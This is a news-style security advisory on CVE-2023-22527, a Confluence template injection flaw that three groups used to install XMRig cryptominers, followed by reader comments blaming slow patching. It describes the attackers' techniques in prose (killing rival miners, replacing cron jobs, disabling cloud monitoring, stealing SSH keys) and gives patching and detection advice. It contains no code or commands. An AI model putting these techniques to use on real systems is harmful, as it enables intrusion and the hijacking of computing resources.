Three distinct threat actor groups are actively weaponizing a critical remote code execution vulnerability in Atlassian Confluence to conduct widespread cryptocurrency mining operations across enterprise networks. The campaigns, documented by Trend Micro researchers through August 2024, demonstrate how unpatched collaboration software becomes a lucrative entry point for cryptojacking at scale.
The Exploit Mechanics
The vulnerability tracked as CVE-2023-22527 carries a maximum CVSS score of 10.0, reflecting its severity as a template injection flaw in Confluence Data Center and Server. The bug allows unauthenticated remote attackers to inject malicious templates that execute arbitrary code on vulnerable instances. Confluence versions 8.0.x through 8.5.3 are affected, with the flaw residing in the way the application processes OGNL (Object-Graph Navigation Language) expressions within template rendering.
Atlassian patched the vulnerability in January 2024, releasing fixed versions 8.5.4 (LTS), 8.6.0 (Data Center), and 8.7.1 (Data Center). However, organizations running outdated installations remain exposed. Trend Micro observed a significant surge in exploitation attempts from mid-June through July 2024, indicating that threat actors continue to find unpatched Confluence servers across the internet.
Affected Systems
The campaigns target any organization running unpatched Confluence Data Center or Server installations. The first threat actor deploys the XMRig cryptocurrency miner through an ELF binary payload delivered directly through the template injection vulnerability. XMRig is an open-source Monero (XMR) mining tool frequently abused by threat actors due to its efficiency and legitimate appearance.
A second threat actor employs a more sophisticated shell script that executes mining activities across all reachable endpoints via SSH. This script systematically terminates known cryptomining processes and any processes running from temporary directories, eliminating competing miners. It then deletes all existing cron jobs and establishes new ones to maintain command-and-control connectivity. The script specifically targets security services, disabling Alibaba Cloud Shield and Tencent Cloud monitoring tools before harvesting IP addresses, user credentials, and SSH keys for lateral movement.
The third threat actor uses similar techniques with additional persistence mechanisms, leveraging multiple cron jobs to ensure continuous mining operations even after system reboots.
The Mitigation Strategy
Organizations running Confluence must immediately upgrade to the latest supported versions. The patch released in January 2024 addresses the template injection vulnerability completely. For environments where immediate patching is not feasible, network-level restrictions should limit access to Confluence instances from trusted IP ranges only.
Security teams should audit their infrastructure for signs of compromise by checking for unexpected XMRig processes, unusual cron job entries, and modified SSH authorized_keys files. Endpoint detection and response solutions should be configured to flag cryptocurrency mining signatures and anomalous CPU utilization patterns, particularly on collaboration platforms and knowledge management servers.
Lessons Learned
The persistence of CVE-2023-22527 exploitation months after patching highlights a critical gap in enterprise vulnerability management. Collaboration platforms like Confluence often house sensitive intellectual property and provide broad network access, making them high-value targets. The fact that three separate threat actor groups are independently exploiting the same vulnerability underscores the attractiveness of unpatched enterprise software as a cryptojacking vector.
Bitcoin traded at approximately $59,100 and Ethereum at $2,525 on August 30, 2024, with the broader crypto market showing modest declines. The ongoing profitability of cryptocurrency mining, particularly privacy coins like Monero that resist traceability, continues to incentivize these attacks regardless of mainstream crypto market conditions.
User Action Required
Administrators should verify their Confluence version immediately, apply the January 2024 security patches if not already done, and conduct a thorough review of system logs and running processes. Organizations using cloud-hosted Confluence should confirm with their providers that patches have been applied. Incident response procedures should include checks for unauthorized mining activity as a standard component of compromise assessment.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always consult with qualified cybersecurity professionals for specific threat mitigation strategies.
worked incident response for a confluence cryptojacking case in 2024. the miners were running xmrig disguised as a java updater process. IT had been ignoring 90% CPU alerts for weeks
CVSS 10.0 and some orgs still havent patched 8 months later. cryptojackers love enterprise inertia more than any zero day
8 months unpatched in production. this is why crypto security is more about ops discipline than finding clever bugs
ops discipline beats clever bugs every time. Confluence had a patch in Jan 2024. August 2024 exploitation means the real vulnerability is organizational inertia
pwn_all organizational inertia is the real CVE here. patch shipped in january, exploitation peaked in august. 7 months of ignoring a CVSS 10 is not a tech problem its a management problem
CVSS 10.0 means maximum severity and orgs still dragged their feet for 8 months. enterprise patch management is a joke
worked at a company that got hit by this exact exploit. IT said they would patch it next quarter. crypto miners ran for 3 months before anyone noticed the CPU spike
three separate threat groups using the same CVE for crypto mining shows how commoditized exploit toolkits have become. OGNL injection in confluence templates is nothing new either
Anika calling it commoditized is right. three groups running the same exploit means the OGNL payload is probably shared on darknet forums for cheap. entry level cryptojacking as a service
three different groups using the same OGNL injection for mining means the exploit kit is probably being rented out as a service at this point
OGNL injection in Confluence templates has been a known pattern since 2022. Atlassian had ample warning but template rendering is hard to secure without breaking features